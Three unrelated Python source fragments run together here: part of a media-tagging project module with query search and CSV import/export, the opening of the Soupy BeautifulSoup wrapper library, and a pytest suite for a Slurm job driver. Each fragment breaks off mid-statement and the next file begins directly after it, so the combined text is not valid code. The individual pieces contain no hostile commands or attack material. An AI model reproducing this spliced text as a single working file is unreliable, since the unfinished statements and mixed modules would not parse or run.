relpath='string', ctime='string', mtime='string', size='int', type='string' ) def _cleanup_query(q, tag_types): type_map = dict(float=FLOAT.from_bytes, int=INT.from_bytes) for term in q.leaves(): if isinstance(term, query.Term): if isinstance(term.text, (str, unicode, bytes)): fieldtype = tag_types[term.fieldname] if fieldtype in type_map: term.text = type_map[fieldtype](term.text) else: term.text = term.text.lower() elif isinstance(term, query.Phrase): term.words = [x.lower() for x in term.words] def _check_value(value, expr): if isinstance(expr, string_types): return expr in value.lower() else: return expr == value def _check_range(x, term): result = True if term.start is not None: if term.startexcl: result &= x > term.start else: result &= x >= term.start if term.end is not None and result: if term.endexcl: result &= x < term.end else: result &= x <= term.end return result def _check_date_range(x, term): result = True if term.startdate is not None: result &= x >= term.start if term.enddate is not None and result: result &= x <= term.end return result def _search_media(expr, m_key, get_tag): """Given search expression, index to media, and a getter to get the attribute check if the media matches expression. """ if expr.is_leaf(): if isinstance(expr, query.Term): attr = expr.fieldname return _check_value(get_tag(m_key, attr), expr.text) elif isinstance(expr, query.Phrase): attr = expr.fieldname text = " ".join(expr.words) return _check_value(get_tag(m_key, attr), text) elif isinstance(expr, query.DateRange): if expr.fieldname == 'ctime': value = get_tag(m_key, 'ctime_') elif expr.fieldname == 'mtime': value = get_tag(m_key, 'mtime_') return _check_date_range(value, expr) elif isinstance(expr, query.NumericRange): attr = expr.fieldname return _check_range(get_tag(m_key, attr), expr) else: print("Unsupported term: %r" % expr) return False else: if isinstance(expr, query.And): result = True for child in expr.children(): result &= _search_media(child, m_key, get_tag) if not result: break return result elif isinstance(expr, query.Or): result = False for child in expr.children(): result |= _search_media(child, m_key, get_tag) if result: break return result elif isinstance(expr, query.Not): subquery = list(expr.children())[0] return not _search_media(subquery, m_key, get_tag) else: print("Unsupported term: %r" % expr) return False class Project(HasTraits): name = Str description = Str path = Str root = Instance(Directory) tags = List(TagInfo) _media = Dict(Str, Media) extensions = List(Str) processors = List(processor.FactoryBase) number_of_files = Long # Path where the project data is saved. save_file = Str last_save_time = Str _data = Dict _tag_data = Dict _relpath2index = Dict() _query_parser = Instance(qparser.QueryParser) def add_tags(self, tags): tags = list(self.tags) + tags self.update_tags(tags) def update_tags(self, new_tags): old_tags = self.tags new_tag_names = set(tag.name for tag in new_tags) tag_info = dict((tag.name, tag.type) for tag in old_tags) removed = [] added = [] for tag in new_tags: if tag.name not in tag_info: added.append(tag) elif tag_info[tag.name] != tag.type: removed.append(tag) added.append(tag) for tag in old_tags: if tag.name not in new_tag_names: removed.append(tag) for tag in removed: del self._tag_data[tag.name] n_entries = len(self._relpath2index) for tag in added: self._tag_data[tag.name] = [tag.default]*n_entries # The above can be the first time when self._tag_data is accessed, when # creating a new project for example. In this case, # self.__tag_data_default is called, so if self.tags is set then the # removed tags will not exist in _tag_data causing an error. So we only # set self.tags below. self.tags = new_tags # Update the cached media for m in self._media.values(): for tag in removed: del m.tags[tag.name] for tag in added: m.tags[tag.name] = tag.default self._query_parser = self._make_query_parser() def copy(self): """Make a copy of this project. This does not copy the data but only the tags, extensions and the other settings of the project. This will not copy any of the processor states but only their settings. """ name = self.name + ' copy' p = Project(name=name) traits = ['description', 'extensions', 'path', 'processors', 'tags'] p.copy_traits(self, traits, copy='deep') # Clear out the _done information from the processors for proc in p.processors: proc._done.clear() return p # #### CRUD interface to the data #### def update(self, media_data, tags=None): """Create/update the internal data given the media data and tags. Parameters ---------- f: vixen.directory.File instance tags: dict """ relpath = media_data.relpath if not self.has_media(relpath): index = len(self._relpath2index) self._relpath2index[relpath] = index for key in MediaData._fields: self._data[key].append(None) for tag in self.tags: self._tag_data[tag.name].append(tag.default) index = self._relpath2index[relpath] for i, key in enumerate(MediaData._fields): self._data[key][index] = media_data[i] if tags: for key, value in tags.items(): self._tag_data[key][index] = value media = self._media.get(relpath) if media is not None: media.update(media_data, tags) def get(self, relpath): """Given the relative path of some media, return a Media instance. """ if relpath in self._media: return self._media[relpath] else: data = {} index = self._relpath2index[relpath] for key in MediaData._fields: data[key] = self._data[key][index] tags = {} for key in self._tag_data: tags[key] = self._tag_data[key][index] media = Media.from_data(MediaData(**data), tags) media.on_trait_change(self._media_tag_handler, 'tags_items') self._media[relpath] = media return media def remove(self, relpaths): """Given a list of relative path of some media, remove them from the database. """ relpath2index = self._relpath2index indices = [(x, relpath2index[x]) for x in relpaths] for relpath, index in sorted(indices, reverse=True): last = len(relpath2index) - 1 if index == last: self._delete_record(last, relpath) else: self._replace_with_last_record(index, last) self._delete_record(last, relpath) def has_media(self, relpath): """Returns True if the media data is available. """ return relpath in self._relpath2index def keys(self): """Return all the keys for the media relative paths.""" return self._relpath2index.keys() def _get_media_attr(self, index, attr): """Given an index to the media, return its value. """ if attr in self._data: return self._data[attr][index] elif attr in self._tag_data: return self._tag_data[attr][index] # #### End of CRUD interface to the data #### def clean(self): """Scan the project and remove any dead entries. This is useful when you remove or rename files. This does not refresh the directory tree or set the number of files. It simply cleans up the db of files that no longer exist. """ logger.info('Cleaning project: %s', self.name) root_path = self.path to_remove = [] relpath2index = self._relpath2index for rpath in list(relpath2index.keys()): fname = os.path.join(root_path, rpath) if not os.path.exists(fname): to_remove.append(rpath) self.remove(to_remove) def export_csv(self, fname, cols=None): """Export metadata to a csv file. If `cols` are not specified, it writes out all the useful metadata. Parameters ----------- fname: str: a path to the csv file to dump. cols: sequence: a sequence of columns to write. """ logger.info('Exporting CSV: %s', fname) all_keys = ((set(MediaData._fields) | set(self._tag_data.keys())) - set(('ctime_', 'mtime_'))) if cols is None: cols = all_keys cols = list(sorted(cols)) data_cols = set([x for x in cols if x in self._data]) with io.open(fname, 'w', newline='', encoding='utf-8') as of: # Write the header. writer = csv.writer(of) writer.writerow(cols) for i in range(len(self._relpath2index)): line = [] for col in cols: if col in data_cols: elem = self._data[col][i] else: elem = self._tag_data[col][i] line.append(elem) writer.writerow(line) def import_csv(self, fname): """Read tag information from given CSV filename. Returns the success status and the error message if any. Note that this only applies tags for column headers with known tags. Unknown tags are not added. Parameters ---------- fname : str Input filename. """ logger.info('Importing tags from: %s', fname) has_header,
from __future__ import print_function, division, unicode_literals from abc import ABCMeta, abstractproperty, abstractmethod from collections import namedtuple from distutils.version import LooseVersion from functools import wraps from itertools import takewhile, dropwhile import operator import re import sys try: from bs4 import BeautifulSoup, PageElement, NavigableString except ImportError: # pragma: no cover raise ImportError("Soupy requires beautifulsoup4") try: import six from six.moves import map assert LooseVersion(six.__version__) >= LooseVersion('1.9') except(ImportError, AssertionError): # pragma: no cover raise ImportError("Soupy requires six version 1.9 or later") __version__ = '0.4.dev' __all__ = ['Soupy', 'Q', 'Node', 'Scalar', 'Collection', 'Null', 'NullNode', 'NullCollection', 'either', 'NullValueError', 'QDebug'] # extract the thing inside string reprs (eg u'abc' -> abc) QUOTED_STR = re.compile("^[ub]?['\"](.*?)['\"]$") QDebug = namedtuple('QDebug', ('expr', 'inner_expr', 'val', 'inner_val')) """Namedtuple that holds information about a failed expression evaluation.""" @six.add_metaclass(ABCMeta) class Wrapper(object): @abstractmethod def val(self): pass # pragma: no cover @abstractmethod def orelse(self, value): pass # pragma: no cover def nonnull(self): """ Require that a node is not null Null values will raise NullValueError, whereas nonnull values return self. useful for being strict about portions of queries. Examples: node.find('a').nonnull().find('b').orelse(3) This will raise an error if find('a') doesn't match, but provides a fallback if find('b') doesn't match. """ return self @abstractmethod def isnull(self): pass # pragma: no cover @abstractmethod def map(self, func): pass # pragma: no cover @abstractmethod def apply(self, func): pass # pragma: no cover @classmethod def wrap(cls, value): """ Wrap value in the appropriate wrapper class, based upon its type. """ if isinstance(value, Wrapper): return value if hasattr(value, 'children'): return Node(value) return Scalar(value) def __getitem__(self, key): return self.map(operator.itemgetter(key)) def dump(self, *args, **kwargs): """ Extract derived values into a Scalar(tuple) or Scalar(dict) The keyword names passed to this function become keys in the resulting dictionary, while positional arguments passed to this function become elements in the resulting tuple. The positional arguments and keyword values are functions that are called on this Node. Notes: - The input functions are called on the Node, **not** the underlying BeautifulSoup element - If the function returns a wrapper, it will be unwrapped - Only either positional arguments or keyword arguments may be passed, not both. Example: >>> soup = Soupy("<b>hi</b>").find('b') >>> data = soup.dump(name=Q.name, text=Q.text).val() >>> data == {'text': 'hi', 'name': 'b'} True >> name, text = soup.dump(Q.name, Q.text).val() >> (name, text) == ('hi', 'b') True """ if args and kwargs: raise ValueError('Cannot pass both arguments and keywords to dump') if args: result = tuple(_unwrap(self.apply(func)) for func in args) else: result = dict((name, _unwrap(self.apply(func))) for name, func in kwargs.items()) return Wrapper.wrap(result) @abstractmethod def require(self, func, msg='Requirement Violated'): pass # pragma: no cover class NullValueError(ValueError): """ The NullValueError exception is raised when attempting to extract values from Null objects """ pass class QKeyError(KeyError): """ A custom KeyError subclass that better formats exception messages raised inside expressions """ def __str__(self): parts = self.args[0].split('\n\n\t') return parts[0] + '\n\n\t' + _dequote(repr(parts[1])) QKeyError.__name__ = str('KeyError') @six.python_2_unicode_compatible class BaseNull(Wrapper): """ This is the base class for null wrappers. Null values are returned when the result of a function is ill-defined. """ def val(self): """ Raise :class:`NullValueError` """ raise NullValueError() def orelse(self, value): """ Wraps value and returns the result """ return Wrapper.wrap(value) def map(self, func): """ Returns :class:`Null` """ return self def apply(self, func): """ Returns :class:`Null` """ return self def nonnull(self): """ Raises :class:`NullValueError` """ raise NullValueError() def require(self, func, msg="Requirement is violated (wrapper is null)"): """ Raises :class:`NullValueError` """ raise NullValueError() def isnull(self): """ Return Scalar(True) if this item is a null value """ return Scalar(True) def __setitem__(self, key, val): pass def __bool__(self): return False __nonzero__ = __bool__ def __str__(self): return "%s()" % type(self).__name__ __repr__ = __str__ def __hash__(self): return hash(type(self)) def __eq__(self, other): return type(self)() def __ne__(self, other): return type(self)() @six.python_2_unicode_compatible class Some(Wrapper): def __init__(self, value): self._value = value def map(self, func): """ Call a function on a wrapper's value, and wrap the result if necessary. Parameters: func : function(val) -> val Examples: >>> s = Scalar(3) >>> s.map(Q * 2) Scalar(6) """ return Wrapper.wrap(_make_callable(func)(self._value)) def apply(self, func): """ Call a function on a wrapper, and wrap the result if necessary. Parameters: func: function(wrapper) -> val Examples: >>> s = Scalar(5) >>> s.apply(lambda val: isinstance(val, Scalar)) Scalar(True) """ return Wrapper.wrap(_make_callable(func)(self)) def orelse(self, value): """ Provide a fallback value for failed matches. Examples: >>> Scalar(5).orelse(10).val() 5 >>> Null().orelse(10).val() 10 """ return self def val(self): """ Return the value inside a wrapper. Raises :class:`NullValueError` if called on a Null object """ return self._value def require(self, func, msg="Requirement violated"): """ Assert that self.apply(func) is True. Parameters: func : func(wrapper) msg : str The error message to display on failure Returns: If self.apply(func) is True, returns self. Otherwise, raises NullValueError. """ if self.apply(func): return self raise NullValueError(msg) def isnull(self): """ Return Scalar(True) if this item is a null value """ return Scalar(False) def __str__(self): # returns unicode # six builds appropriate py2/3 methods from this return "%s(%s)" % (type(self).__name__, _repr(self._value)) def __repr__(self): return repr(self.__str__())[1:-1] # trim off quotes def __setitem__(self, key, val): return self.map(Q.__setitem__(key, val)) def __hash__(self): return hash(self._value) def __eq__(self, other): return self.map(lambda x: x == other) def __ne__(self, other): return self.map(lambda x: x != other) class Null(BaseNull): """ The class for ill-defined Scalars. """ def __getattr__(self, attr): return Null() def __call__(self, *args, **kwargs): return Null() def __gt__(self, other): return Null() def __ge__(self, other): return Null() def __lt__(self, other): return Null() def __le__(self, other): return Null() def __len__(self): raise TypeError("Null has no len()") def __add__(self, other): return Null() def __sub__(self, other): return Null() def __mul__(self, other): return Null() def __div__(self, other): return Null() def __floordiv__(self, other): return Null() def __pow__(self, other): return Null() def __mod__(self, other): return Null() def __truediv__(self, other): return Null() def __hash__(self): return super(Null, self).__hash__() class Scalar(Some): """ A wrapper around single values. Scalars support boolean testing (<, ==, etc), and use the wrapped value in the comparison. They return the result as a Scalar(bool). Calling a Scalar calls the wrapped value, and wraps the result. Examples: >>> s = Scalar(3) >>> s > 2 Scalar(True) >>> s.val() 3 >>> s + 5 Scalar(8) >>> s + s Scalar(6) >>> bool(Scalar(3)) True >>> Scalar(lambda x: x+2)(5) Scalar(7) """ def __getattr__(self, attr): return self.map(operator.attrgetter(attr)) def __call__(self, *args, **kwargs): return self.map(operator.methodcaller('__call__', *args, **kwargs)) def __gt__(self, other): return self.map(lambda x: x > other) def __ge__(self, other): return self.map(lambda x: x >= other) def __lt__(self, other): return self.map(lambda x: x < other) def __le__(self, other): return self.map(lambda x: x <= other) def __bool__(self): return bool(self._value) __nonzero__ = __bool__ def __len__(self): return len(self._value) def __add__(self, other): if isinstance(other, BaseNull): return other return self.map(Q + _unwrap(other)) def __sub__(self, other): if isinstance(other, BaseNull): return other return self.map(Q - _unwrap(other)) def __mul__(self, other): if isinstance(other, BaseNull): return other return self.map(Q * _unwrap(other)) def __div__(self, other): if isinstance(other, BaseNull): return other return self.map(Q / _unwrap(other)) def __floordiv__(self, other): if isinstance(other, BaseNull): return other return self.map(Q // _unwrap(other)) def __pow__(self, other): if isinstance(other, BaseNull): return other return self.map(Q ** _unwrap(other)) def __mod__(self, other): if isinstance(other, BaseNull): return other return self.map(Q % _unwrap(other)) def __truediv__(self, other): if isinstance(other, BaseNull): return other return self.map(Q / _unwrap(other)) class Collection(Some): """ Collection's store lists of other wrappers. They support most of the list methods (len, iter, getitem, etc). """ def __init__(self, items): super(Collection, self).__init__(list(items)) self._items = self._value self._assert_items_are_wrappers() def _assert_items_are_wrappers(self): for item in self: if not isinstance(item, Wrapper): raise TypeError("Collection can only hold other wrappers") def val(self): """ Unwraps each item in the collection, and returns as a list """ return list(self.iter_val()) def first(self): """ Return the first element of the collection, or :class:`Null` """ return self[0] def iter_val(self): """ An iterator version of :meth:`val` """ return (item.val() for item in self._items) def each(self, *funcs): """ Call `func` on each element in the collection. If multiple functions are provided, each item in the output will be a tuple of each func(item) in self. Returns a new Collection. Example: >>> col = Collection([Scalar(1), Scalar(2)]) >>> col.each(Q * 10) Collection([Scalar(10), Scalar(20)]) >>> col.each(Q * 10, Q - 1) Collection([Scalar((10,
<filename>tests/driver/test_slurm_driver.py import os import shutil from datetime import timedelta, datetime, date from typing import Collection, Iterator from unittest.mock import Mock, ANY, call import pytest from kong import util from kong.config import Config, slurm_schema from kong.drivers import InvalidJobStatus from kong.drivers.slurm_driver import ( SlurmInterface, SlurmDriver, SlurmAccountingItem, ShellSlurmInterface, ) from kong.model.folder import Folder from kong.model.job import Job from kong.util import is_executable, exhaust @pytest.fixture def driver(monkeypatch, state): # set some config values data = state.config.data.copy() data["slurm_driver"] = dict( account="pseudo_account", node_size=42, default_queue="somequeue" ) state.config = Config(data) monkeypatch.setattr(SlurmInterface, "__abstractmethods__", set()) monkeypatch.setattr(ShellSlurmInterface, "__init__", Mock(return_value=None)) sif = ShellSlurmInterface() return SlurmDriver(state.config, sif) def test_sacct_parse(driver, monkeypatch, state): sacct_output = """ 5205197|FAILED|2:0|2020-03-17T10:10:35|2020-03-17T10:16:23|2020-03-17T14:16:48|z0021 5205197.batch|FAILED|2:0|2020-03-17T10:10:35|2020-03-17T10:16:23|2020-03-17T14:16:48|z0021 5205197.extern|COMPLETED|0:0|2020-03-17T10:10:35|2020-03-17T10:16:23|2020-03-17T14:16:48|z0021 5205197.0|FAILED|2:0|2020-03-17T10:10:35|2020-03-17T10:16:23|2020-03-17T14:16:48|z0021 5205206|FAILED|2:0|2020-03-18T10:10:35|2020-03-18T10:16:23|2020-03-18T14:16:48|z0022 5205206.batch|FAILED|2:0|2020-03-18T10:10:35|2020-03-18T10:16:23|2020-03-18T14:16:48|z0022 5205206.extern|COMPLETED|0:0|2020-03-18T10:10:35|2020-03-18T10:16:23|2020-03-18T14:16:48|z0022 5205206.0|FAILED|2:0|2020-03-18T10:10:35|2020-03-18T10:16:23|2020-03-18T14:16:48|z0022 5205209|FAILED|2:0|2020-03-19T10:10:35|2020-03-19T10:16:23|2020-03-19T14:16:48|z0023 5205209.batch|FAILED|2:0|2020-03-19T10:10:35|2020-03-19T10:16:23|2020-03-19T14:16:48|z0023 5205209.extern|COMPLETED|0:0|2020-03-19T10:10:35|2020-03-19T10:16:23|2020-03-19T14:16:48|z0023 5205209.0|FAILED|2:0|2020-03-19T10:10:35|2020-03-19T10:16:23|2020-03-19T14:16:48|z0023 5205223|FAILED|13:0|2020-03-20T10:10:35|2020-03-20T10:16:23|2020-03-20T14:16:48|z0024 5205223.batch|FAILED|13:0|2020-03-20T10:10:35|2020-03-20T10:16:23|2020-03-20T14:16:48|z0024 5205223.extern|COMPLETED|0:0|2020-03-20T10:10:35|2020-03-20T10:16:23|2020-03-20T14:16:48|z0024 5205223.0|FAILED|13:0|2020-03-20T10:10:35|2020-03-20T10:16:23|2020-03-20T14:16:48|z0024 5205350|FAILED|13:0|2020-03-21T10:10:35|2020-03-21T10:16:23|2020-03-21T14:16:48|z0025 5205350.batch|FAILED|13:0|2020-03-21T10:10:35|2020-03-21T10:16:23|2020-03-21T14:16:48|z0025 5205350.extern|COMPLETED|0:0|2020-03-21T10:10:35|2020-03-21T10:16:23|2020-03-21T14:16:48|z0025 5205350.0|FAILED|13:0|2020-03-21T10:10:35|2020-03-21T10:16:23|2020-03-21T14:16:48|z0025 5205355|PENDING|0:0|2020-03-22T10:10:35||| 5205757|COMPLETED|0:0|2020-03-23T10:10:35|2020-03-23T10:16:23|2020-03-23T14:16:48|z0026 5205757.batch|COMPLETED|0:0|2020-03-23T10:10:35|2020-03-23T10:16:23|2020-03-23T14:16:48|z0026 5205757.extern|COMPLETED|0:0|2020-03-23T10:10:35|2020-03-23T10:16:23|2020-03-23T14:16:48|z0026 5205757.0|COMPLETED|0:0|2020-03-23T10:10:35|2020-03-23T10:16:23|2020-03-23T14:16:48|z0026 22822|NOCLUE|0:0||2020-03-17T10:10:35|| """.strip() with monkeypatch.context() as m: mock = Mock(return_value=sacct_output.split("\n")) m.setattr(driver.slurm, "_sacct", mock) td = timedelta(days=10) res = list(driver.slurm.sacct([], td)) starttime = date.today() - td mock.assert_called_once_with( format="JobID,State,ExitCode,Submit,Start,End,NodeList", noheader=True, parsable2=True, starttime=starttime, _iter=True, ) db = datetime(2020, 3, 17, 10, 10, 35) def fmt(dt): return dt.strftime("%Y-%m-%dT%H:%M:%S") def make_other(d, host): return dict( submit=fmt(d), start=fmt(d.replace(minute=16, second=23)), end=fmt(d.replace(hour=14, minute=16, second=48)), node=host, ) ref = [ SlurmAccountingItem( 5_205_197, Job.Status.FAILED, 2, other=make_other(db, "z0021") ), SlurmAccountingItem( 5_205_206, Job.Status.FAILED, 2, other=make_other(db.replace(day=18), "z0022"), ), SlurmAccountingItem( 5_205_209, Job.Status.FAILED, 2, other=make_other(db.replace(day=19), "z0023"), ), SlurmAccountingItem( 5_205_223, Job.Status.FAILED, 13, other=make_other(db.replace(day=20), "z0024"), ), SlurmAccountingItem( 5_205_350, Job.Status.FAILED, 13, other=make_other(db.replace(day=21), "z0025"), ), SlurmAccountingItem( 5_205_355, Job.Status.SUBMITTED, 0, other={ "submit": fmt(db.replace(day=22)), "start": None, "end": None, "node": None, }, ), SlurmAccountingItem( 5_205_757, Job.Status.COMPLETED, 0, other=make_other(db.replace(day=23), "z0026"), ), SlurmAccountingItem( 22822, Job.Status.UNKNOWN, 0, other={ "submit": None, "start": fmt(db.replace(day=17)), "end": None, "node": None, }, ), ] assert len(ref) == len(res) for a, b in zip(ref, res): assert a == b assert a.other == b.other batch_job_id = 5_207_375 sbatch = Mock(return_value=f"Submitted batch job {batch_job_id}") m.setattr(driver.slurm, "_sbatch", sbatch) job = Job() job.data["batchfile"] = "somefile.sh" jid = driver.slurm.sbatch(job) sbatch.assert_called_once_with("somefile.sh") assert jid == batch_job_id job.batch_job_id = jid scancel = Mock() m.setattr(driver.slurm, "_scancel", scancel) driver.slurm.scancel(job) scancel.assert_called_once_with(batch_job_id) def test_repr(): sai = SlurmAccountingItem(1, Job.Status.UNKNOWN, 0, {}) assert repr(sai) != "" def test_create_job(driver, state): root = Folder.get_root() j1 = driver.create_job( command="sleep 1", folder=root, cores=1, name="job1", queue="somequeue", walltime=timedelta(hours=5), ) assert j1.status == Job.Status.CREATED assert len(root.jobs) == 1 and root.jobs[0] == j1 assert j1.batch_job_id is None assert os.path.exists(j1.data["log_dir"]) assert os.path.exists(j1.data["output_dir"]) assert os.path.exists(j1.data["jobscript"]) assert os.path.exists(j1.data["batchfile"]) assert is_executable(j1.data["jobscript"]) j2 = driver.create_job( command="sleep 1", walltime="03:00:00", folder=root, licenses="bliblablubb" ) assert j2.data["walltime"] == "03:00:00" with open(j2.data["jobscript"]) as f: jobscript = f.read() assert str(j2.job_id) in jobscript assert str(j2.cores) in jobscript assert j2.command in jobscript for v in ["output_dir", "log_dir", "stdout"]: assert j2.data[v] in jobscript with open(j2.data["batchfile"]) as f: batchfile = f.read() assert str(j2.cores) in batchfile assert str(j2.memory) in batchfile for v in [ "name", "slurm_out", "queue", "ntasks", "nnodes", "walltime", "account", "jobscript", "licenses", ]: assert str(j2.data[v]) in batchfile with pytest.raises(ValueError): driver.create_job(command="sleep 1", walltime="100:00:00", folder=root) with pytest.raises(ValueError): driver.create_job(command="sleep 1", walltime=42, folder=root) def test_submit_job(driver, state, monkeypatch): root = Folder.get_root() j1 = driver.create_job( command="sleep 1", folder=root, cores=1, name="job1", queue="somequeue", walltime=timedelta(hours=5), ) assert j1.status == Job.Status.CREATED j1.status = Job.Status.SUBMITTED j1.save() with pytest.raises(InvalidJobStatus): driver.submit(j1) j1.status = Job.Status.CREATED j1.save() batch_job_id = 5_207_375 with monkeypatch.context() as m: sbatch = Mock(return_value=f"Submitted batch job {batch_job_id}") m.setattr(driver.slurm, "_sbatch", sbatch) driver.submit(j1) sbatch.assert_called_once_with(j1.data["batchfile"]) assert j1.status == Job.Status.SUBMITTED assert j1.batch_job_id == str(batch_job_id) def test_resubmit_job(driver, state, monkeypatch): root = Folder.get_root() j1 = driver.create_job(command="sleep 1", folder=root) assert j1.status == Job.Status.CREATED batch_job_id = 5_207_375 sbatch = Mock(return_value=batch_job_id) monkeypatch.setattr(driver.slurm, "sbatch", sbatch) driver.submit(j1) sbatch.assert_called_once_with(j1) assert j1.status == Job.Status.SUBMITTED assert j1.batch_job_id == str(batch_job_id) monkeypatch.setattr(driver.slurm, "sacct", Mock(return_value=[])) with pytest.raises(InvalidJobStatus): driver.resubmit(j1) SAI = SlurmAccountingItem monkeypatch.setattr( driver.slurm, "sacct", Mock(return_value=[SAI(j1.batch_job_id, Job.Status.FAILED, 0, {})]), ) bjid2 = 42 sbatch = Mock(return_value=bjid2) monkeypatch.setattr(driver.slurm, "sbatch", sbatch) with monkeypatch.context() as m: # job errors on kill, resubmits anyway m.setattr(driver, "kill", Mock(side_effect=RuntimeError())) m.setattr("os.path.exists", Mock(side_effect=[True, False, False])) m.setattr("os.remove", Mock()) j1 = driver.resubmit(j1) sbatch.assert_called_once() assert j1.status == Job.Status.SUBMITTED assert j1.batch_job_id == str(bjid2) # gets new batch job id with monkeypatch.context() as m: m.setattr(driver, "sync_status", Mock()) # disable sync for a second with pytest.raises(InvalidJobStatus): driver.resubmit(j1) # stays in SUBMITTED, not accepted monkeypatch.setattr( driver.slurm, "sacct", Mock(return_value=[SAI(j1.batch_job_id, Job.Status.FAILED, 0, {})]), ) # will go to failed bjid3 = 99 sbatch = Mock(return_value=bjid3) monkeypatch.setattr(driver.slurm, "sbatch", sbatch) j1 = driver.resubmit(j1) sbatch.assert_called_once() assert j1.status == Job.Status.SUBMITTED assert j1.batch_job_id == str(bjid3) def test_job_bulk_resubmit(driver, state, monkeypatch): root = Folder.get_root() jobs = [ driver.create_job( command="echo 'begin'; sleep 0.2 ; echo 'end' ; exit 1", folder=root ), driver.create_job( command="echo 'begin'; sleep 0.2 ; echo 'end' ; exit 1", folder=root ), driver.create_job( command="echo 'begin'; sleep 0.2 ; echo 'end' ; exit 1", folder=root ), ] other_job = driver.create_job( command="echo 'begin'; sleep 0.2 ; echo 'end' ; exit 1", folder=root ) other_job.status = Job.Status.COMPLETED other_job.save() jobs[0].status = Job.Status.FAILED jobs[0].save() sbatch = Mock(side_effect=[1, 2, 3]) monkeypatch.setattr(driver.slurm, "sbatch", sbatch) driver.bulk_submit(jobs[1:]) assert sbatch.call_count == 2 for job in jobs[1:]: job.status = Job.Status.COMPLETED with open(job.data["stdout"], "w") as f: f.write("hurz") job.save() shutil.rmtree(jobs[0].data["output_dir"]) # we need to prevent driver from actually calling submit submit = Mock() remove = Mock(wraps=os.remove) makedirs = Mock() with monkeypatch.context() as m: m.setattr(driver, "submit", submit) m.setattr(driver.slurm, "sacct", Mock(return_value=[])) m.setattr(driver, "bulk_kill", Mock(side_effect=RuntimeError)) m.setattr("os.remove", remove) m.setattr("os.makedirs", makedirs) driver.bulk_resubmit(jobs) assert submit.call_count == len(jobs) remove.assert_has_calls([call(j.data["stdout"]) for j in jobs[1:]], any_order=True) makedirs.assert_has_calls( [call(j.data["output_dir"]) for j in jobs[1:]], any_order=True ) for job in jobs: job.reload() assert job.status == Job.Status.CREATED # bug: all jobs where reset to created. Check this is not the case anymore other_job.reload() assert other_job.status != Job.Status.CREATED def test_resubmit_bulk_invalid_status(driver, state, monkeypatch): monkeypatch.setattr(driver, "sync_status", Mock()) j1 = driver.create_job(command="sleep 1", folder=state.cwd) for status in (Job.Status.CREATED, Job.Status.SUBMITTED, Job.Status.RUNNING): j1.status = status j1.save() with pytest.raises(InvalidJobStatus): driver.bulk_resubmit([j1]) def test_job_bulk_resubmit_no_submit(driver, state, monkeypatch): root = Folder.get_root() jobs = [ driver.create_job( command="echo 'begin'; sleep 0.2 ; echo 'end' ; exit 1", folder=root ), driver.create_job( command="echo 'begin'; sleep 0.2 ; echo 'end' ; exit 1", folder=root ), driver.create_job( command="echo 'begin'; sleep 0.2 ; echo 'end' ; exit 1", folder=root ), ] sbatch = Mock(side_effect=[1, 2, 3]) monkeypatch.setattr(driver.slurm, "sbatch", sbatch) driver.bulk_submit(jobs) assert sbatch.call_count == 3 for job in jobs: job.status = Job.Status.COMPLETED job.save() bulk_submit = Mock() with monkeypatch.context() as m: m.setattr(driver.slurm, "sacct", Mock(return_value=[])) m.setattr(driver, "bulk_submit", bulk_submit) driver.bulk_resubmit(jobs, do_submit=False) assert bulk_submit.call_count == 0 def test_stdout_stderr(driver, state, monkeypatch): root = Folder.get_root() j1 = driver.create_job( command="sleep 1", folder=root, cores=1, name="job1", queue="somequeue", walltime=timedelta(hours=5), ) assert j1.status == Job.Status.CREATED batch_job_id = 5_207_375 sbatch = Mock(return_value=batch_job_id) monkeypatch.setattr(driver.slurm, "sbatch", sbatch) driver.submit(j1) assert j1.status == Job.Status.SUBMITTED assert j1.batch_job_id == str(batch_job_id) stdout = "VALUE VALUE VALUE" with open(j1.data["stdout"], "w") as fh: fh.write(stdout) with driver.stdout(j1) as fh: assert stdout == fh.read() with pytest.raises(NotImplementedError): driver.stderr(j1) def test_sync_status(driver, monkeypatch): root = Folder.get_root() j1 = driver.create_job(command="sleep 1", folder=root) with monkeypatch.context() as m: sbatch = Mock(return_value=1) m.setattr(driver.slurm, "sbatch", sbatch) assert j1.status == Job.Status.CREATED batch_job_id = 5_207_375 monkeypatch.setattr(driver.slurm, "sbatch", Mock(return_value=batch_job_id)) driver.submit(j1) assert j1.status == Job.Status.SUBMITTED assert j1.batch_job_id == str(batch_job_id) sacct_return = [ [SlurmAccountingItem(batch_job_id, Job.Status.RUNNING, 0, {})], [SlurmAccountingItem(batch_job_id, Job.Status.FAILED, 0, {})], ] sacct = Mock(side_effect=sacct_return) monkeypatch.setattr(driver.slurm, "sacct", sacct) j1 = driver.sync_status(j1) assert j1.status == Job.Status.RUNNING j1 = driver.sync_status(j1) assert j1.status == Job.Status.FAILED def test_bulk_create(driver, state): root = Folder.get_root() jobs = driver.bulk_create_jobs( [{"folder": root, "command": "sleep 1"} for i in range(10)] ) assert len(jobs) == 10 for job in jobs: assert job.status == Job.Status.CREATED def test_bulk_submit(driver, state, monkeypatch): root = Folder.get_root() jobs = [ driver.create_job(folder=root, command=f"sleep 0.1; echo 'JOB{i}'") for i in range(15) ] assert len(jobs) == 15 for job in jobs: assert job.status == Job.Status.CREATED sbatch = Mock( side_effect=[f"Submitted batch job {i + 1}" for i in range(len(jobs))] ) monkeypatch.setattr(driver.slurm, "_sbatch", sbatch) driver.bulk_submit(jobs) assert sbatch.call_count == len(jobs) for job in jobs: assert job.status == Job.Status.SUBMITTED assert str(job.job_id) == job.batch_job_id def test_bulk_sync_status(driver, state, monkeypatch): root = Folder.get_root() jobs = [ driver.create_job(folder=root, command=f"sleep 0.1; echo 'JOB{i}'") for i in range(15) ] assert len(jobs) == 15 for job in jobs: assert job.status == Job.Status.CREATED sbatch = Mock(side_effect=[i + 1 for i in range(len(jobs))]) monkeypatch.setattr(driver.slurm, "sbatch", sbatch) driver.bulk_submit(jobs) sacct_return = [ "|".join([str(i + 1), "RUNNING", "0:0", "", "", "", ""]) for i in range(len(jobs)) ] sacct = Mock(return_value=sacct_return) # pretend they're all running now monkeypatch.setattr(driver.slurm, "_sacct", sacct) jobs = driver.bulk_sync_status(jobs) sacct.assert_called_once_with( jobs=",".join([j.batch_job_id for j in jobs]), format="JobID,State,ExitCode,Submit,Start,End,NodeList", noheader=True, parsable2=True, starttime=ANY, _iter=True, ) for job in jobs: assert job.status == Job.Status.RUNNING sacct_return = [ "|".join([str(i + 1), "COMPLETED" if i < 6 else "FAILED", "0:0"] + [""] * 4) for i in range(len(jobs)) ] sacct = Mock(return_value=sacct_return) monkeypatch.setattr(driver.slurm, "_sacct", sacct) jobs = driver.bulk_sync_status(jobs) sacct.assert_called_once_with( 